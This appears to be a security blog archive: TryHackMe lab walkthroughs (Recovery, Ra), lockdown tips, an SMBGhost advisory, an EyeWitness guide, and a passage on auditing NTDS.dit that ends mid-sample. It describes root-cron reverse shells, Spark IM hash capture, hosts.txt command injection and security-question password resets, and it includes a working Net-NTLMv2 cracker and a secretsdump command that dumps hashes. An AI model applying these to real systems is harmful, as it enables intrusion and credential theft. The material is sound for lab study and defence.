Recovery – TryHackMe Walkthrough

This will be a walkthrough of the weekly challenge “Recovery” from TryHackMe. It was released July 31, 2020.

The Scenario

Hi, it’s me, your friend Alex.

I’m not going to beat around the bush here; I need your help. As you know I work at a company called Recoverysoft. I work on the website side of things, and I set up an Ubuntu web server to run it. Yesterday one of my work colleagues sent me the following email:

Hi Alex,
A recent security vulnerability has been discovered that affects the web server. Could you please run this binary on the server to implement the fix?
Regards
- Teo

Attached was a Linux binary called fixutil. As instructed, I ran the binary, and all was good. But this morning, I tried to log into the server via SSH and I received this message:

YOU DIDN’T SAY THE MAGIC WORD! YOU DIDN’T SAY THE MAGIC WORD! YOU DIDN’T SAY THE MAGIC WORD!

It turns out that Teo got his mail account hacked, and fixutil was a targeted malware binary specifically built to destroy my webserver!

When I opened the website in my browser I got some crazy nonsense. The webserver files had been encrypted! Before you ask, I don’t have any other backups of the webserver (I know, I know, horrible practice, etc…), and I don’t want to tell my boss, he’ll fire me for sure.

Please access the web server and repair all the damage caused by fixutil. You can find the binary in my home directory. Here are my ssh credentials:

Username: alex
Password: madeline

I have set up a control panel to track your progress on port 1337. Access it via your web browser. As you repair the damage, you can refresh the page to receive those “flags” I know you love hoarding.

Good luck!
– Your friend Alex

The Solution

To start, we attempt to SSH in with the given credentials. As soon as the session opens, “YOU DIDN’T SAY THE MAGIC WORD!” scrolls endlessly on the screen. You might remember the line from Jurassic Park: https://www.youtube.com/watch?v=RfiQYRn7fBg. Another thing you’ll notice is that when you kill the session, the shell reports a while loop being terminated, which tells us the spam comes from a loop in one of the shell’s startup files.

Bash reads a file called .bashrc from the user’s home directory every time it starts an interactive shell, so anything appended to it runs on every login.

We can bypass it in a few ways: ask sshd to run a different shell that does not read .bashrc (/bin/sh, the Bourne-compatible shell; “sh” here is not “secure shell”), or start bash with the flags that skip its startup files:

ssh -t username@hostname /bin/sh
ssh -t user@host bash --norc --noprofile

But I went with another way, because I was not worried about keeping alex’s .bashrc for this challenge:

ssh user@host "rm .bashrc"
ssh user@host

At this point, we’ll have Flag 0 which you can check on REMOTEIP:1337.

One thing you’ll notice with the path I chose is that you will get logged out fairly quickly, but that’s fine for now. We’ll figure it out soon. If you look in alex’s home directory, you’ll find a file called “fixutil” which is what the scenario referenced as the malware binary. I copied it over to my Kali instance using scp:

Now, I don’t do too much malware analysis, but I can run strings on it and see if I can get anything. One thing we notice is the while loop being put into the .bashrc file:

We also notice that a root SSH key is added, a new user called “security” is added, and /etc/cron.d/evil runs a script called /opt/brilliant_script.sh every minute. We don’t have high enough privileges to do anything about the root SSH key or the security user yet, but let’s take a look at that cron job.

The brilliant_script.sh looks like this:

So, it’s essentially what is killing our sessions. However, the file is writable by us, so let’s stop it from killing our sessions.

What I did was overwrite the script with a whoami command that writes its output to a file in my home directory, so I could show you that root is what runs the script from cron.

So not only did we get rid of the code that was kicking us out, we found a privilege escalation vector: a cron job running as root executes a script we can write to. I set up a netcat listener, put a reverse shell in the script, and got a root shell on the next run. From there I changed the root password. I can then “su -” in my SSH session and I’m root.

(screenshots: the remote session, and the listener on my machine)
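The condition that made this work (a root cron job executing a script an unprivileged user can write) is easy to audit for, on a box you are attacking or one you are defending. The following is an added example written for this walkthrough, not the author’s code or anything from the box: it parses /etc/cron.d-style entries (schedule, user, command), resolves which file cron will actually execute, and reports jobs that run as root whose script is writable by a given uid/gid set. The cron directory, script names and modes below are constructed in a temporary directory; the names evil and brilliant_script.sh mirror the box but their contents are assumed.

```python
from __future__ import annotations

import os
import re
import stat
import tempfile
from dataclasses import dataclass

# /etc/cron.d entries carry a user field between the schedule and the command:
#   minute hour day-of-month month day-of-week user command
# (an @reboot/@daily style shortcut replaces the five schedule fields).
CRON_D_LINE = re.compile(
    r"^\s*(?P<sched>@\w+|\S+\s+\S+\s+\S+\s+\S+\s+\S+)\s+(?P<user>\S+)\s+(?P<cmd>.+?)\s*$"
)
# cron hands the command to "sh -c", so if the first word is an interpreter
# the file that matters is the next argument ("bash /opt/x.sh").
INTERPRETERS = {"sh", "bash", "dash", "python", "python3", "perl"}


@dataclass
class CronJob:
    source: str     # cron.d file the job came from
    schedule: str
    user: str       # account cron runs the command as
    command: str
    script: str     # file we would need write access to


def parse_cron_d(path: str) -> list[CronJob]:
    """Parse one /etc/cron.d file; comments, blank lines and VAR=value lines are skipped."""
    jobs = []
    with open(path) as fh:
        for raw in fh:
            line = raw.rstrip("\n")
            if not line.strip() or line.lstrip().startswith("#") or re.match(r"^\s*\w+=", line):
                continue
            m = CRON_D_LINE.match(line)
            if not m:
                continue
            tokens = m.group("cmd").split()
            script = tokens[0]
            if os.path.basename(script) in INTERPRETERS and len(tokens) > 1:
                script = tokens[1]
            jobs.append(CronJob(path, m.group("sched"), m.group("user"), m.group("cmd"), script))
    return jobs


def writable_by(path: str, uid: int, gids: set[int]) -> bool:
    """Can uid (member of gids) modify path? Judged from the mode bits after resolving symlinks."""
    try:
        st = os.stat(path)
    except OSError:
        return False   # missing script is a different finding (create it yourself); not covered here
    if st.st_uid == uid and st.st_mode & stat.S_IWUSR:
        return True
    if st.st_gid in gids and st.st_mode & stat.S_IWGRP:
        return True
    return bool(st.st_mode & stat.S_IWOTH)


def find_escalation_candidates(cron_dir: str, uid: int, gids: set[int]) -> list[CronJob]:
    """Jobs that cron runs as root but whose script the given user can rewrite."""
    hits = []
    for name in sorted(os.listdir(cron_dir)):
        for job in parse_cron_d(os.path.join(cron_dir, name)):
            if job.user == "root" and writable_by(job.script, uid, gids):
                hits.append(job)
    return hits


def demo() -> list[str]:
    """Constructed stand-in for the box: an 'evil' cron.d entry running a world-writable script
    as root, next to a harmless entry and one that runs the same script as an unprivileged user."""
    with tempfile.TemporaryDirectory() as root:
        cron_dir = os.path.join(root, "cron.d")
        os.mkdir(cron_dir)
        evil_script = os.path.join(root, "brilliant_script.sh")
        safe_script = os.path.join(root, "logrotate.sh")
        for script, mode in ((evil_script, 0o777), (safe_script, 0o755)):
            with open(script, "w") as fh:
                fh.write("#!/bin/sh\n")
            os.chmod(script, mode)
        with open(os.path.join(cron_dir, "evil"), "w") as fh:
            fh.write(f"* * * * * root {evil_script}\n")
        with open(os.path.join(cron_dir, "maint"), "w") as fh:
            fh.write("SHELL=/bin/sh\n# nightly cleanup\n")
            fh.write(f"0 3 * * * root {safe_script} --quiet\n")
            fh.write(f"*/5 * * * * alex bash {evil_script}\n")   # writable, but not run as root
        # Audit as an unprivileged user (made-up uid/gid 424242) who owns none of these
        # files, i.e. alex's position on the box rather than whoever created the temp dir.
        hits = find_escalation_candidates(cron_dir, uid=424242, gids={424242})
        return [os.path.basename(h.script) for h in hits]


if __name__ == "__main__":
    if os.path.isdir("/etc/cron.d"):
        me, groups = os.getuid(), set(os.getgroups()) | {os.getgid()}
        for job in find_escalation_candidates("/etc/cron.d", me, groups):
            print(f"{job.source}: runs {job.script} as root on '{job.schedule}' and we can write it")
```

Run as alex, the real audit loop at the bottom would list /etc/cron.d/evil. It only checks the script file’s own mode bits; a script that lives in a directory you can write to is just as hijackable (delete and recreate it), so check parent directories too when the file itself comes back clean.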

Now that we’re root, we don’t need the evil script. At this point, we have Flag 1. Then let’s get rid of the security user that was created. This gets us Flag 4. I did not screenshot this 🙂 Look up how to delete a user (userdel), or remove the user’s lines from /etc/passwd and /etc/shadow.

Let’s get rid of the root ssh key. It’ll be in /root/.ssh/. I just deleted authorized_keys. That gives us Flag 3.

This leaves us with 2 flags left. Let’s take another look at the strings output of fixutil.

As you can see, it moved the original logging.so aside to oldliblogging.so and dropped its own library in its place. And if you look here, you can see that oldliblogging.so is actually the original logging library:

So, let’s go back by running this:

This gets us Flag 2 which leaves us with one last flag.

Let’s take a look at this again:

Let’s take a look at the top 3 directories/files.

Well, it looks like the htdocs were encrypted.

And the backup.txt looks like it could be the key. But how do we decrypt?

Well, after looking at the fixutil strings again, you can see a reference to XOR, so the files were encrypted with a simple XOR against a key.

So, the next step I took was copy over all the files to my local system.

I then used CyberChef to decrypt the files: https://gchq.github.io/CyberChef/

You can see I used the XOR recipe with the key we got from backup.txt (as UTF-8) and ran it over the files in htdocs. This decrypted the files. I then took the files from my system and put them back on the remote system.

First, I copied them to Alex’s home folder and then used my root shell to move to the /usr/local/apache2/htdocs/ directory:
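The CyberChef step can be scripted, which matters when htdocs has more than a handful of files. This is an added example, not the author’s code or anything from the challenge: a repeating-key XOR routine applied to every file under a directory, with the key read from a file like backup.txt. XOR is its own inverse, so the same function encrypts and decrypts, which is exactly why a key left next to the ciphertext undoes fixutil’s damage. The directory layout, key and file contents below are constructed in a temporary directory; the key length and the htdocs_encrypted/htdocs_plain paths in the usage line are assumptions.

```python
from __future__ import annotations

import tempfile
from pathlib import Path


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR. Since (x ^ k) ^ k == x, one function both encrypts and decrypts."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def load_key(key_file: Path) -> bytes:
    """Key as raw bytes (CyberChef's UTF-8 key option). A trailing newline left by echo or an
    editor is stripped, because that extra byte would otherwise become part of the key."""
    return key_file.read_bytes().rstrip(b"\r\n")


def looks_like_text(data: bytes) -> bool:
    """Cheap sanity check so a wrong key is noticed: recovered web files should be mostly printable."""
    if not data:
        return True
    printable = sum(1 for b in data if 32 <= b < 127 or b in b"\r\n\t")
    return printable / len(data) > 0.95


def xor_tree(src: Path, dst: Path, key: bytes, exclude=()) -> dict[str, bool]:
    """XOR every regular file under src into the same relative path under dst (src is left
    untouched, so a wrong key costs nothing). Returns {relative path: looks_like_text(result)}."""
    report: dict[str, bool] = {}
    for path in sorted(p for p in src.rglob("*") if p.is_file()):
        rel = path.relative_to(src).as_posix()
        if rel in exclude:
            continue
        plain = xor_bytes(path.read_bytes(), key)
        out = dst / rel
        out.parent.mkdir(parents=True, exist_ok=True)
        out.write_bytes(plain)
        report[rel] = looks_like_text(plain)
    return report


def demo() -> tuple[dict[str, bool], str]:
    """Constructed scenario: a tiny htdocs encrypted with a key that was left in backup.txt,
    then recovered the way the walkthrough does it with CyberChef."""
    key = b"supersecretkey42"          # constructed; on the box the key comes from backup.txt
    originals = {
        "index.html": b"<html><body><h1>Recoverysoft</h1></body></html>\n",
        "css/style.css": b"body { color: #333; }\n",
    }
    with tempfile.TemporaryDirectory() as tmp:
        htdocs = Path(tmp) / "htdocs"
        (htdocs / "css").mkdir(parents=True)
        for rel, content in originals.items():
            (htdocs / rel).write_bytes(xor_bytes(content, key))   # what fixutil left behind
        (htdocs / "backup.txt").write_bytes(key + b"\n")           # key stored next to the ciphertext
        recovered = Path(tmp) / "recovered"
        report = xor_tree(htdocs, recovered, load_key(htdocs / "backup.txt"), exclude={"backup.txt"})
        for rel, content in originals.items():
            assert (recovered / rel).read_bytes() == content
        return report, (recovered / "index.html").read_text()


if __name__ == "__main__":
    # Assumed layout: encrypted copy pulled down with scp, key file alongside it.
    result = xor_tree(Path("htdocs_encrypted"), Path("htdocs_plain"),
                      load_key(Path("backup.txt")), exclude={"backup.txt"})
    for rel, ok in result.items():
        print(f"{'ok ' if ok else 'BAD'} {rel}")
```

If every entry comes back BAD, the key is wrong (or the key file’s newline was part of the real key); if only images and fonts do, that is expected, since binary assets fail the printable check even when correctly recovered.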

This will give us Flag 5. And we’re done. Woot.

Bonus

I went ahead and put fixutil in Ghidra to get the decompiled version of the binary:

Ra – TryHackMe Walkthrough

I’m writing this post as I go through the Ra challenge on TryHackMe. I will try to be as detailed as possible as I’m trying to differentiate from other writeups. I want the reader to learn as much as possible.

Port Scanning

Usually for THM, I stick with the top 1000 ports (nmap’s default) unless I’m not finding much. This is just a time thing. To be thorough, you’d obviously want to check all ports in a pentest. For now I run “sudo nmap -v -sS IP”.

Checking The Website

So, I looked at the website.

One thing that we notice from this screenshot is that there’s a password reset link. But when we try to go to it, we get this:

We can resolve this error by adding fire.windcorp.thm to our hosts file or go directly to this link with the IP address. I went ahead and edited my hosts file (/etc/hosts)

From here, we can click the link and get the reset password page:

We don’t really have usernames or answers to these questions yet, but here are a list of the questions:

Looking further at the main page, we see a quick tidbit about 3 employees

One of these employees “Lily Levesque” has a picture with a dog which could be her favorite pet (a security question). I decided to reverse image search on google to see if we could do some OSINT, but got even luckier when I copied the image location and pasted into Google.

While this was luck (sometimes luck is what you need), I would have eventually seen this if I was just going through the sources of the page, which is definitely a step I’d take if I’m not getting anywhere and need to figure out what everything is doing. Also, I would have had to save the picture anyway, since it sits on a private THM network and Google wouldn’t have been able to retrieve it. This was a slip-up as I’m used to public websites :). Anyway, let’s move forward.

Now, at this point I thought we didn’t have her username and tried stuff like llevesque and l.levesque and lily.levesque and then my brain clicked that it was also in the image name “lilyle”. I went ahead and reset the password.

POST /check.asp HTTP/1.1
Host: fire.windcorp.thm
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://fire.windcorp.thm/reset.asp
Content-Type: application/x-www-form-urlencoded
Content-Length: 40
Connection: close
Cookie: JSESSIONID=node0n5xkn7uovpg3zgps7rsx4x8l29.node0; ASPSESSIONIDQQSCDTTQ=CCEJCFHDGMGKCHAEKENNEINE
Upgrade-Insecure-Requests: 1

username=lilyle&question=3&secret=Sparky

And I got the response:

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/10.0
Date: Fri, 14 Aug 2020 20:01:09 GMT
Connection: close
Content-Length: 1038

<head>

  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="">
  <meta name="author" content="">

  <title>Windcorp.</title>

  <!-- Bootstrap core CSS -->
  <link href="vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">

  <!-- Custom fonts for this template -->
  <link href="vendor/fontawesome-free/css/all.min.css" rel="stylesheet">
  <link href="vendor/simple-line-icons/css/simple-line-icons.css" rel="stylesheet" type="text/css">
  <link href="https://fonts.googleapis.com/css?family=Lato:300,400,700,300italic,400italic,700italic" rel="stylesheet" type="text/css">

  <!-- Custom styles for this template -->
  <link href="css/landing-page.min.css" rel="stylesheet">

</head>

<body>

<div class="jumbotron" style="height:100vh;">

<h4 class='display-3'>Your password has been reset to: <b>ChangeMe#1234</b><br></h4>Remember to change it after logging in!

</div>

</body>

</html>

You can see in this response that the password was changed to “ChangeMe#1234”. Yay!

Using The Credentials

Now, where do we sign in? Well, we had other ports open on the system, so let’s try the credentials against SMB. I tried running CrackMapExec but was not able to log in, so I just tried enumerating shares using smbmap.

A share called “Shared” was enumerated and we can see the flag and some executables.

I used smbclient to download these files:

When downloading the .deb I kept running into issues with timeout errors.

I fixed this by adding a timeout (-t)

Now, we can install the .deb file

After installing it, running “spark” from the terminal brings up the UI, so now we know it’s Spark Instant Messenger. We can attempt to log in with the same creds we have.

Previously if you ran into certificate errors, you might want to check the options in Advanced:

Okay, so we’re authenticated. Now what? Let’s look up what Spark IM is. After Googling “Spark Instant Messenger exploit” you’ll eventually come across CVE-2020-12772.

When searching for an exploit for CVE-2020-12772, you eventually come across a Github page:

Cool, so now we know we can send something to someone, but to who? Well, on the webpage, there were XMPP links. Let’s choose someone.

Since it shows Buse Candan online, I chose to target them.

Okay, so we know that we need to make this user authenticate to us and capture the Net-NTLMv2 response by exploiting the vulnerability found. In order to do this, we’ll use Responder. We’ve used Responder before: https://gameofpwnz.com/responder-multirelay-mimikatz-crackmapexec-windows-pwnage/

We set the -I as “tun0” because we are on the VPN. We then send the payload to Buse:

Now we capture his hash in Responder:

Now that we have a hash, we can crack it. It is not usable for pass-the-hash: what Responder captured is a Net-NTLMv2 challenge-response (an HMAC keyed off the NT hash and bound to the server challenge), not the NT hash itself. Relaying is out as well, because the only host we could relay to is the one the authentication came from, and relaying a machine’s authentication back to itself is blocked: https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html

We will try to crack it with rockyou.txt since it’s THM and that is pretty much what is expected. Net-NTLMv2 is hashcat mode 5600 (mode 2600 is md5(md5($pass)) and will never match this format).

The mode is important. If you don’t put the right mode it won’t work.
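To make concrete what mode 5600 does, and why the capture cannot simply be “passed”, here is an added example of mine (not from the walkthrough, Responder or hashcat) that reproduces the Net-NTLMv2 computation in pure Python: NT hash = MD4(UTF-16LE(password)); NTLMv2 key = HMAC-MD5(NT hash, UPPER(user) + domain as UTF-16LE); NTProofStr = HMAC-MD5(NTLMv2 key, server challenge + client blob). A Responder line is user::domain:challenge:NTProofStr:blob, and cracking means recomputing NTProofStr per candidate password. The user, domain, challenge, blob and wordlist are constructed; MD4 is implemented inline because OpenSSL 3 builds of Python frequently refuse hashlib.new("md4").

```python
from __future__ import annotations

import hashlib
import hmac
import struct


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 (needed for NT hashes; hashlib's md4 is 'legacy' in OpenSSL 3 and often missing)."""
    mask = 0xFFFFFFFF
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & mask
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)          # bit length, little-endian
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for i in range(16):                             # round 1
            a, b, c, d = d, rotl((a + F(b, c, d) + X[i]) & mask, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):                             # round 2
            k = (i % 4) * 4 + i // 4
            a, b, c, d = d, rotl((a + G(b, c, d) + X[k] + 0x5A827999) & mask, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):                             # round 3
            k = (0, 8, 4, 12)[i % 4] + (0, 2, 1, 3)[i // 4]
            a, b, c, d = d, rotl((a + H(b, c, d) + X[k] + 0x6ED9EBA1) & mask, (3, 9, 11, 15)[i % 4]), b, c
        h = [(x + y) & mask for x, y in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    """The value stored in NTDS/SAM and the one pass-the-hash needs."""
    return md4(password.encode("utf-16le"))


def ntlmv2_key(password: str, user: str, domain: str) -> bytes:
    # Username is upper-cased; the domain/target name is used exactly as it appears in the capture.
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()


def nt_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr: bound to this server challenge and this client blob, so it is single-use."""
    return hmac.new(ntlmv2_key(password, user, domain), server_challenge + blob, hashlib.md5).digest()


def capture_line(user: str, domain: str, password: str, server_challenge: bytes, blob: bytes) -> str:
    """What Responder logs and hashcat -m 5600 consumes: user::domain:challenge:NTProofStr:blob."""
    proof = nt_proof(password, user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def crack_netntlmv2(line: str, wordlist) -> str | None:
    """Mode-5600 logic: recompute NTProofStr for each candidate and compare. Nothing in the
    capture yields the NT hash directly, which is why it cannot be used for pass-the-hash."""
    user, _, rest = line.strip().partition("::")
    domain, chal_hex, proof_hex, blob_hex = rest.split(":", 3)
    chal, proof, blob = bytes.fromhex(chal_hex), bytes.fromhex(proof_hex), bytes.fromhex(blob_hex)
    for candidate in wordlist:
        candidate = candidate.rstrip("\r\n")
        if hmac.compare_digest(nt_proof(candidate, user, domain, chal, blob), proof):
            return candidate
    return None


def demo() -> str | None:
    """Constructed capture (user, domain, password, challenge and blob are all made up)."""
    chal = bytes.fromhex("1122334455667788")
    blob = bytes.fromhex("0101000000000000") + b"\x00" * 8 + bytes.fromhex("aabbccddeeff0011") + b"\x00" * 4
    line = capture_line("jdoe", "WINDCORP", "Summer2020!", chal, blob)
    return crack_netntlmv2(line, ["password", "letmein", "Summer2020!", "Winter2019"])


if __name__ == "__main__":
    # Real use: crack_netntlmv2(open("responder.txt").readline(), open("/usr/share/wordlists/rockyou.txt", errors="ignore"))
    print(demo())
```

Every candidate costs one MD4 plus two HMAC-MD5s, which is why hashcat gets through rockyou in seconds on a GPU; the domain string must be passed through byte-for-byte from the capture, since a case change there silently breaks the comparison.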

Looks like we cracked it. Now let’s use it. After toying around with ways to use the credentials, I installed Evil-WinRM so I could use WinRM to log in.

I then found the 2nd flag in the Desktop. We then see a scripts directory in c:\

When opening the files in the scripts directory, we’ll see a ps1 file is run every minute. If you look at the ps1 file, you’ll see this line:

This reads whatever is in hosts.txt in Brittany’s folder and hands it to Invoke-Expression, i.e. runs it as PowerShell. Whoever can write hosts.txt therefore controls what this script executes, and it executes every minute.

We need to get access to that hosts.txt file. Let’s check what permissions we have and what groups we’re in.

This didn’t get us much.

After looking up all the groups, we can see that Account Operators gives us the ability to alter accounts (it can reset passwords on ordinary domain accounts, though not on members of protected groups such as Administrators): https://www.secframe.com/blog/account-operators

We then change BrittanyCR’s password using the net user command:

We can then use smbmap to figure out the shares BrittanyCR has access to:

We can then see we can upload to the hosts.txt file:

Our hosts.txt looks like this:

The leading “;” terminates the command in the ps1 script we found earlier and then we use net user to add gameofpwnz and put them in the Administrators group.

We can verify the GameOfPWNZ user is created:

We then use WinRM to login and cat the admin flag:

And that’s it. We completed this box and got our points.

My Lockdown Tips

I have had the privilege of working from home. If you are new to working from home, let’s chat.

  1. Go through the same routine as if you were going into the office. If you shower, do that. If you drink coffee, do that. Get dressed. Even if you don’t have to webcam for work, it’ll help with productivity.
  2. Establish your work area. It can be rough to bring work home because the separation between your personal life and work becomes a thin line that can go either way. Either you see chores you want to do while working or you allow work to leak over past work hours because you have just a little bit more.
  3. Keep your normal hours. This may be tough if you have others living with you, but try to be consistent. Consistency is key.
  4. Take breaks. Even just a small little sit down on the porch/balcony. You need to breathe. You need to not stay seated all day.
  5. Listen to music. It can feel lonely if you have no sound.
  6. Use your messaging system. Keep in contact with coworkers. Don’t let yourself become too lonely. If your work doesn’t use a chat, use your social media (don’t overdo it).
  7. Establish a “closing” routine. At the end of your work day, create a routine like closing your laptop and having a snack or maybe changing clothes into something more comfortable (similar to when you come home from the office).
  8. Watch your posture. At the office, you have an office chair and a desk. At home, you may be tempted to work a few hours from the couch. Don’t let yourself hunch over too much.

——

For general lockdown,

  1. Use Twitch or YouTube to chat with people. You can stream or watch other streamers. It’ll let you into the life of others quarantined at home and make you feel closer to others.
  2. Utilize FaceTime/Skype/Discord/snapchat to video chat with your friends and family. Even just having it on while you both are doing something can be helpful in taking away the lonely feeling.
  3. Catch up on that series you said you’d watch.
  4. Pick up that video game you thought you’d give a try.
  5. Read a book. Sign up for Audible and listen to books.
  6. Get some rest. We are always in a fast paced life and forget to rest. Allow yourself to be calm. Allow yourself to breathe. Allow yourself to rest.
  7. Make sure to eat your meals. Don’t forget meals. Don’t snack too much all day. Eat like you normally do or use this time to eat better. Learn to cook if you don’t do it often.
  8. Do small workouts at home. You can’t go to the gym but look up body weight exercises. I use the Ring Fit Adventure game while home. It’s fun.
  9. Keep your place clean. A clean space is a more welcoming space. Don’t get lazy while you’re home.
  10. Become Tik Tok famous. lol jk. But it might boost your creativity.
  11. Take up a new hobby like drawing, painting, bead art.
  12. Do Twitch Sings! It’s like karaoke at home with people online.
  13. Download some puzzle apps. It’s good to keep your mind active. And the satisfaction of solving puzzles will help with the positive attitude.
  14. Use the dating app you said you were done with or would never use. I’m not saying you have to go on dates, but learn about someone new. Engage in conversation. Yeah that thing they did in the old days.

That’s what I have for now. If you have any other suggestions, leave them in the comments. If you have any questions, also leave them in the comments or directly message me. We, as a community, will get through this.

SMBv3 Vulnerability ( CVE-2020-0796 )

Yesterday Microsoft and Talos “accidentally” revealed CVE-2020-0796. It appeared and then disappeared, but remnants of the posts were left behind. Microsoft has published an advisory, and it appears the vulnerability is in SMBv3 compression.

Microsoft Advisory: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200005

Fortinet Post: https://fortiguard.com/encyclopedia/ips/48773

Microsoft’s workaround is to disable SMBv3 compression on servers (a registry setting) and to block TCP port 445 at the enterprise perimeter; blocking ports 137, 139 and 445 inbound and outbound on host firewalls where SMB is not needed is a reasonable extra step. Also, make sure you’re logging and monitoring!

Search for the possibly vulnerable servers using the script here:

This will be one to keep an eye out on as everyone believes this to be a “wormable” vulnerability which is already getting coined terms like “EternalBlue-er”, “CoronaBlue”, and “SMBGhost”, and “EternalDarkness.”

I will post more information as it becomes available.

Screenshots and Default Passwords with EyeWitness

EyeWitness

“EyeWitness is designed to take screenshots of websites, RDP services, and open VNC servers, provide some server header info, and identify default credentials if possible.”

https://tools.kali.org/information-gathering/eyewitness

Assumptions:

You’re using Kali Linux

Downloads:

https://github.com/FortyNorthSecurity/EyeWitness

Setup

root@kali:/opt# git clone https://github.com/FortyNorthSecurity/EyeWitness.git
root@kali:/opt# cd EyeWitness/setup
root@kali:/opt/EyeWitness/setup# ./setup.sh

Using a file with hosts (-f)

root@kali:/PATH/TO/HOSTSFILE# python /opt/EyeWitness/EyeWitness.py -f hosts.txt --web

Using an nmap xml file (-x)

root@kali:/PATH/TO/NMAP/SCANS# python /opt/EyeWitness/EyeWitness.py -x nmapscan.xml --web

If you want to add more http or https ports, you can use the following:

--add-http-ports 9000,9001 --add-https-ports 9002,9003

Extra!

You can perform an active scan which will search for common locations of login forms and attempt to use common credentials against those web applications.

--active-scan

Example Output

Performing a Quick Password Audit on NTDS.dit

Assumptions

You’re using the latest Kali OS.
You can contact the Domain Controller.
You have an admin account on the Domain Controller.

What is the NTDS.dit?

“The Ntds.dit file is a database that stores Active Directory data, including information about user objects, groups, and group membership. It includes the password hashes for all users in the domain.”

Getting a copy of the NTDS.dit

There are many different tools for getting the Ntds.dit file and extracting hashes from it, but this post will be covering one tool. You can check other tools such as VSSAdmin, NinjaCopy, etc.

Impacket

In this blog, I’ll be using Impacket’s secretsdump.py.

If you’re not using Kali, you can install impacket on Linux just using the following:

pip install pyasn1
pip install impacket

Then to dump the password hashes, you can use the following syntax:

secretsdump.py -just-dc-ntlm <DOMAIN>/<USER>@<DOMAINCONTROLLER> >> ntds.txt

It’ll ask you for the password for that user. This will save the output to ntds.txt.
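Before handing ntds.txt to John, the dump itself already answers a few audit questions. The following is an added example, not code from this post or from Impacket: it parses secretsdump’s `domain\user:rid:lmhash:nthash:::` lines and reports accounts with a blank password, accounts that still have an LM hash stored (LM is trivially crackable), and groups of accounts that share an NT hash (the same password on several accounts, typically a service account and a human). The sample dump below is constructed; the only real constants are the NT hash of the empty string and the “no LM hash” marker, and 8846f7ea… is the NT hash of the word “password”.

```python
from __future__ import annotations

from collections import defaultdict
from dataclasses import dataclass

EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # MD4 of the empty string: the account has a blank password
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of the empty string: no LM hash is stored


@dataclass(frozen=True)
class NtdsEntry:
    domain: str
    user: str
    rid: int
    lm: str
    nt: str

    @property
    def is_machine(self) -> bool:
        return self.user.endswith("$")


def parse_secretsdump(text: str) -> list[NtdsEntry]:
    """Parse DOMAIN\\user:RID:LMHASH:NTHASH::: lines; banners, [*] status lines and
    password-history entries (from -history) are skipped."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("[") or not line.endswith(":::"):
            continue
        parts = line.split(":")
        if len(parts) != 7:
            continue
        account, rid, lm, nt = parts[0], parts[1], parts[2].lower(), parts[3].lower()
        if "_history" in account.lower():
            continue
        domain, _, user = account.rpartition("\\")
        if not rid.isdigit() or len(lm) != 32 or len(nt) != 32:
            continue
        entries.append(NtdsEntry(domain, user, int(rid), lm, nt))
    return entries


def audit(entries: list[NtdsEntry]) -> dict[str, list]:
    """Findings that need no cracking at all."""
    findings: dict[str, list] = {"blank_password": [], "lm_hash_present": [], "shared_nt_hash": []}
    by_nt: dict[str, list[str]] = defaultdict(list)
    for e in entries:
        if e.is_machine:
            continue   # machine accounts have long random passwords; noise for this audit
        if e.nt == EMPTY_NT:
            findings["blank_password"].append(e.user)
        if e.lm != EMPTY_LM:
            findings["lm_hash_present"].append(e.user)
        by_nt[e.nt].append(e.user)
    for nt, users in by_nt.items():
        if len(users) > 1 and nt != EMPTY_NT:
            findings["shared_nt_hash"].append(sorted(users))
    findings["shared_nt_hash"].sort()
    return findings


def to_john_nt(entries: list[NtdsEntry]) -> list[str]:
    """user:nthash lines for john --format=NT, machine accounts left out."""
    return [f"{e.user}:{e.nt}" for e in entries if not e.is_machine]


# Constructed sample of what secretsdump -just-dc-ntlm prints (names and most hashes made up).
SAMPLE = """\
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0cb6948805f797bf2a82807973b89537:::
CORP\\jdoe:1105:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
CORP\\svc_backup:1106:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
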